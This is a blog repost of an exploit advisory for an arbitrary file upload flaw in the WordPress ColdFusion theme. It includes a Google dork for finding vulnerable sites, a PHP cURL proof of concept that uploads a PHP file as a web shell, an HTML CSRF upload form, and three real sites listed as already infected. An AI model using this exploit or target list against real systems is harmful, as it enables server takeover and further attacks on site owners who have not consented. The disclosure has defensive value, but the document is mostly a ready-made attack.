Halaman

WordPress theme ColdFusion Arbitrary File Upload Vulnerability

Sabtu, 28 November 2015

#-Title: WordPress theme ColdFusion Arbitrary File Upload Vulnerability
#-Author: Smail Max / Bet0
#-Date: 10/31/2013
#- Vendor : themeforest. net
#- Link Download : themeforest. net/item/coldfusion-responsive-fullscreen-video-image-audio/4381748
#-Google Dork: inurl:wp-content/themes/ColdFusion
#- Tested on : Win7, Linux
#- Fixed in ??
////////////////////////////////////////////////////////////////////////////////////////////

Information of Bug : 

Bugtraq ID: 63523
Class: Input Validation Error
CVE: -
Remote: Yes
Local: No
Published: Nov 01 2013 12:00AM
Updated: Nov 01 2013 12:00AM
Credit: Bet0
When Vulnerable: {"status":"NOK", "ERR":"This file is incorect"}

Description : 
The ColdFusion Theme for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input. 

An attacker can exploit this issue to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access to the application; other attacks are also possible.


Solution:
Currently, we are not aware of any vendor-supplied patches.

-- Proof Of Concept --

With Remote Code :

<?php
$uploadfile="3xploi7.php";
$ch = curl_init("http://localcrot/wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php");
curl_setopt($ch, CURLOPT_POST, true); 
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

With CSRF :

<form
action="http://localcrot/wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php" method="post" enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type="submit" name="submit" value="3xploi7ed !">
</form>

If Succesfully (with CSRF) : 

Shell Path : Here

Site Demo (Infected) :
http://www.laughinXgcowproductions.com/wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php
http://www.alias-phXoto.com/wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php
http://www.manueXl-portela.com/wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php


Tidak ada komentar:

Posting Komentar